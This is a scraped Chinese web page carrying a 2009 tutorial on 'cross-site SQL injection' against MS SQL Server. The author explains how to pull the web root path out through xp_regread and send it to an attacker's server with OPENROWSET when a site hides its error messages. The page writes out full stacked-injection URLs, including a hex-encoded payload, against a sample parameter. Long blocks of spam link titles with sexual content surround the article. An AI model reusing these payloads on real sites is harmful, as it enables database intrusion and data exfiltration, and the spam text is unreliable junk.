国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

跨站式SQL注入技巧
2009-01-03   

前一階段,在嘗試攻擊一個網站的時候,發(fā)現(xiàn)對方的系統(tǒng)已經屏蔽了錯誤信息,用的也是普通的帳號連接的數(shù)據庫,系統(tǒng)也是打了全部的補丁這樣要攻擊注入是比較麻煩的。。因此我自己搞了一種“跨站式SQL注入”。。
思路如下,既然你不顯示錯誤信息,我能不能讓你顯示到別的地方呢?讓SQL把錯誤寫入別的地方。。。
既然是研究階段,我們最好不要直接注入網站,而是首先用查詢分析器來分析這個方法。。
第一個想法:
SQL可以連接外部的數(shù)據庫。。
于是,首先用查詢分析器,登陸到我自己的一個虛擬主機的數(shù)據庫(這樣的權限比較小),然后在本地啟動一個SQL server,并且用SA的身份在SQL事件探測器里邊建立一個跟蹤。  
嘗試 sp_addlinkedserver 如果成功,那就和操作本地數(shù)據庫一樣了。。  
提示必須是sysadmin的身份。。失敗。 
換一個思路:
只要你SQL敢發(fā)命令過來,我不管執(zhí)行的結果怎么樣,只要接獲到命令就可以了。。  
于是考慮到一個權限要求不是很高的命令:OPENROWSET 來跨服務器查詢。。這個命令作用是把一個數(shù)據庫命令發(fā)給遠程的數(shù)據庫,取回來結果集。。于是就啟動“事件跟蹤”監(jiān)視發(fā)過來的命令。。  
第一次嘗試,首先還是執(zhí)行 create table [dbo].[laokai]([cha8][char](255))--建立一個表。隨后是把路徑寫入數(shù)據庫,這里我考慮,直接生成一個跨庫的腳本算了。好方便執(zhí)行。。
DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into laokai (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''你的IP'';''sa'';''密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
這段代碼什么意思哪?就是把網站的路徑信息寫入數(shù)據庫。。也不是單純的寫,寫得同時構造一個SQL語句,這個語句的執(zhí)行結果是給laokai這個數(shù)據庫的cha8字段增加了這樣的一行記錄。  
SELECT a.* FROM OPENROWSET('SQLOLEDB','你的IP';'sa';'密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''C:\Inetpub,,1''')AS a
其中的C:\Inetpub,,1就是注冊表記錄的根目錄,最后要做的是:
DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM laokai) exec (@a1);--
這樣就等于執(zhí)行了
SELECT a.* FROM OPENROWSET('SQLOLEDB','你的IP';'sa';'密碼', 'SELECT * FROM pubs.dbo.authors where au_fname=''C:\Inetpub,,1''')AS a
這一條語句。。。同時你會在事件探測器那邊會顯示  
SELECT * FROM pubs.dbo.authors where au_fname='C:\Inetpub,,1'
其中的C:\Inetpub 就是網站的路徑。。調試成功。。  
現(xiàn)在進入實戰(zhàn)階段。。某網站屏蔽了全部出錯信息。。但是我們可以確定它存在注入點 a.asp?id=1,怎么做呢?
a.asp?id=1;create table [dbo].[laokai]([cha8][char](255))--
返回正常,我們建立了一個叫l(wèi)aokai的表,有個字段叫cha8,然后:
a.asp?id=1;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into laokai (cha8) values('SELECT a.* FROM OPENROWSET(''SQLOLEDB'',''你的IP'';''sa'';''密碼'', ''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--
出錯了。。出錯信息被屏蔽了。。怎么辦?經過研究發(fā)現(xiàn)是里邊的某些字符例如 +號需要轉化成16進制。。或許還有別的地方要轉化。。怎么辦啊?
于是寫了一個ASCII轉化16進制的工具,把全部的代碼轉化一下,然后注入就OK了。。(工具的地址 http://www.cha8.com/ascii.rar 麻煩放入光盤,不要讓他們下,我的服務器受不了),最后自然是執(zhí)行上述語句了。。
a.asp?id=1;%44%45%43%4C%41%52%45%20%40%72%65%73%75%6C%74%20%76%61%72%63%68%61%72%28%32%35%35%29%20%65%78%65%63%20%6D%61%73%74%65%72%2E%64%62%6F%2E%78%70%5F%72%65%67%72%65%61%64%20%27%48%4B%45%59%5F%4C%4F%43%41%4C%5F%4D%41%43%48%49%4E%45%27%2C%27%53%59%53%54%45%4D%5C%43%4F%4E%54%52%4F%4C%53%65%74%30%30%31%5C%53%65%72%76%69%63%65%73%5C%57%33%53%56%43%5C%50%61%72%61%6D%65%74%65%72%73%5C%56%69%72%74%75%61%6C%20%52%6F%6F%74%73%27%2C%20%27%2F%27%20%2C%40%72%65%73%75%6C%74%20%6F%75%74%70%75%74%20%69%6E%73%65%72%74%20%69%6E%74%6F%20%6C%61%6F%6B%61%69%20%28%63%68%61%38%29%20%76%61%6C%75%65%73%28%27%53%45%4C%45%43%54%20%61%2E%2A%20%46%52%4F%4D%20%4F%50%45%4E%52%4F%57%53%45%54%28%27%27%53%51%4C%4F%4C%45%44%42%27%27%2C%27%27%3F%3F%49%50%27%27%3B%27%27%73%61%27%27%3B%27%27%3F%3F%27%27%2C%20%27%27%53%45%4C%45%43%54%20%2A%20%46%52%4F%4D%20%70%75%62%73%2E%64%62%6F%2E%61%75%74%68%6F%72%73%20%77%68%65%72%65%20%61%75%5F%66%6E%61%6D%65%/33.shtml' target='_blank' class='article'>3D%27%27%27%27%27%20%2B%20%40%72%65%73%75%6C%74%20%2B%20%27%27%27%27%27%27%27%29%41%53%20%61%27%29%3B%2D%2D%20
執(zhí)行成功。。。
a.asp?id=1;DECLARE @a1 char(255) set @a1=(SELECT cha8 FROM laokai) exec (@a1);--
網站那邊顯示還是正常頁面。。但是你這邊的事件探測器那邊會顯示:



注入成功。。后邊知道了絕對路徑,如何添加的文章就很多了。。這里就不再描述了。。
最后說明一下:這只是一個新型的攻擊思路的講解,讓大家通過另外一種方式把數(shù)據庫里邊的數(shù)據取出來。。
''SELECT * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''' 部分,修改成insert把數(shù)據加入數(shù)據庫也應該沒有問題。。甚至單獨保留 @result 都沒問題。。不過這樣那邊會出錯。這邊就留下一個exec 'C:\Inetpub,,1'

熱詞搜索:

上一篇:數(shù)據庫下載漏洞攻擊技術
下一篇:對一個大型網絡硬盤營業(yè)站點的測試

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美成人高清电影在线| 精品日韩一区二区三区| 91国内精品野花午夜精品| 中文字幕av不卡| 成人av动漫网站| 亚洲国产电影在线观看| 99国产精品久| 亚洲韩国精品一区| 欧美高清视频不卡网| 蜜臀99久久精品久久久久久软件| 91精品国产乱| 国产制服丝袜一区| 国产精品久久久久影院老司| 91麻豆国产自产在线观看| 亚洲五月六月丁香激情| 日韩一区二区免费视频| 国产盗摄一区二区三区| 又紧又大又爽精品一区二区| 日韩一区二区三| 欧美色中文字幕| 亚洲一二三四区| 久久亚洲一区二区三区明星换脸| 色婷婷久久久综合中文字幕| 亚洲国产综合色| 欧美大片在线观看| 91丨porny丨首页| 奇米精品一区二区三区在线观看| 国产欧美精品区一区二区三区| 欧美午夜精品一区| 成人午夜精品在线| 美女脱光内衣内裤视频久久影院| 亚洲日本成人在线观看| 欧美电视剧免费全集观看| www..com久久爱| 免费国产亚洲视频| 亚洲一二三区在线观看| 中文字幕在线观看一区| 精品国产一区二区三区不卡| 日本精品裸体写真集在线观看| 久草在线在线精品观看| 亚洲福利视频一区| 自拍视频在线观看一区二区| 精品国产123| 欧美精品在线观看播放| 欧美午夜精品久久久久久孕妇 | 日韩午夜精品电影| 色综合av在线| 9色porny自拍视频一区二区| 国产激情一区二区三区四区| 九一久久久久久| 日韩在线一区二区| 亚洲国产成人精品视频| 亚洲制服欧美中文字幕中文字幕| 国产精品成人在线观看| 久久九九久精品国产免费直播| 日韩欧美国产精品一区| 91.xcao| 欧美精品日韩精品| 在线播放91灌醉迷j高跟美女 | 亚洲天堂网中文字| 国产精品传媒视频| 亚洲视频免费在线| 亚洲精品中文在线| 亚洲精品成人少妇| 亚洲精品v日韩精品| 亚洲激情五月婷婷| 一区二区三区欧美| 石原莉奈在线亚洲二区| 青青草视频一区| 久久www免费人成看片高清| 极品尤物av久久免费看| 裸体在线国模精品偷拍| 韩国一区二区三区| 成人激情免费电影网址| 99re热这里只有精品免费视频| 91免费在线播放| 欧美午夜免费电影| 日韩一区二区三区视频| 国产女同互慰高潮91漫画| ●精品国产综合乱码久久久久| 亚洲国产一区二区在线播放| 美女视频第一区二区三区免费观看网站| 麻豆国产91在线播放| www.在线成人| 欧美久久久一区| 久久久一区二区| 日韩理论片中文av| 美美哒免费高清在线观看视频一区二区| 国产在线精品一区二区夜色| 99天天综合性| 91精品久久久久久蜜臀| 久久久久久久综合| 亚洲综合色在线| 久草热8精品视频在线观看| 99国内精品久久| 日韩一级免费一区| 日韩理论片一区二区| 久久精品国产网站| 日本久久电影网| 国产亚洲欧美日韩在线一区| 亚洲国产精品一区二区久久 | 国产精品国产三级国产专播品爱网| 亚洲天堂中文字幕| 美脚の诱脚舐め脚责91| 色综合久久99| 久久久久久一级片| 日韩精品91亚洲二区在线观看 | 国产精品自拍在线| 欧美美女网站色| 天天做天天摸天天爽国产一区| 免费观看在线色综合| 成人av电影在线网| 欧美大片日本大片免费观看| 亚洲影视资源网| 成人国产亚洲欧美成人综合网| 这里是久久伊人| 亚洲欧洲99久久| 国产精品一品二品| 精品国精品国产| 奇米综合一区二区三区精品视频| 色天使色偷偷av一区二区| 中文在线资源观看网站视频免费不卡 | 精品国产电影一区二区| 首页欧美精品中文字幕| 99精品在线观看视频| 久久精品夜色噜噜亚洲aⅴ| 麻豆91在线观看| 日韩亚洲国产中文字幕欧美| 五月婷婷另类国产| 在线观看日韩国产| 一区二区三区免费在线观看| 91色九色蝌蚪| 亚洲精品成人悠悠色影视| 色av一区二区| 一区二区三区在线视频观看58| 99久久er热在这里只有精品15| 综合在线观看色| 99久久久久久99| 亚洲男女毛片无遮挡| 91麻豆国产福利精品| 亚洲免费观看在线观看| 在线免费一区三区| 亚洲综合在线五月| 一本色道a无线码一区v| 亚洲一区二区视频在线| 欧美精品在线观看播放| 青青草成人在线观看| 亚洲精品一区二区三区蜜桃下载| 国产精品羞羞答答xxdd| 国产精品久久久久一区| 91久久免费观看| 日韩主播视频在线| 精品国产乱码久久久久久免费| 国产福利一区二区三区视频在线 | 亚洲bt欧美bt精品777| 制服丝袜亚洲播放| 久久99精品国产麻豆不卡| 国产欧美一区二区在线| 99re热这里只有精品免费视频| 一级中文字幕一区二区| 青青草原综合久久大伊人精品优势 | 麻豆成人av在线| 欧美日韩色一区| 亚洲图片激情小说| 久久99国产精品成人| 成人sese在线| 久久精品视频在线免费观看| 国产成人日日夜夜| 久久久久久久精| 这里是久久伊人| 欧美日韩国产乱码电影| 欧美极品aⅴ影院| 国产在线视视频有精品| 天天综合天天做天天综合| 日本一区二区三级电影在线观看| 亚洲不卡在线观看| 亚洲午夜久久久久久久久久久| 中文字幕乱码亚洲精品一区| 日韩在线一二三区| 国产日韩欧美综合一区| 欧美国产精品劲爆| 国产成人激情av| 亚洲国产cao| 国产午夜亚洲精品不卡| 欧美色精品天天在线观看视频| 精品在线观看视频| 亚洲午夜三级在线| 国产精品久久久久影院| 欧美国产精品久久| 亚洲精品精品亚洲| 欧美高清你懂得| 亚洲三级久久久| 亚洲乱码国产乱码精品精98午夜 | 狠狠色综合日日| 亚洲视频中文字幕| 久久久天堂av| 欧美一区二区三区在线看| 99热国产精品| 国产精品一区二区黑丝| 日韩国产精品久久久|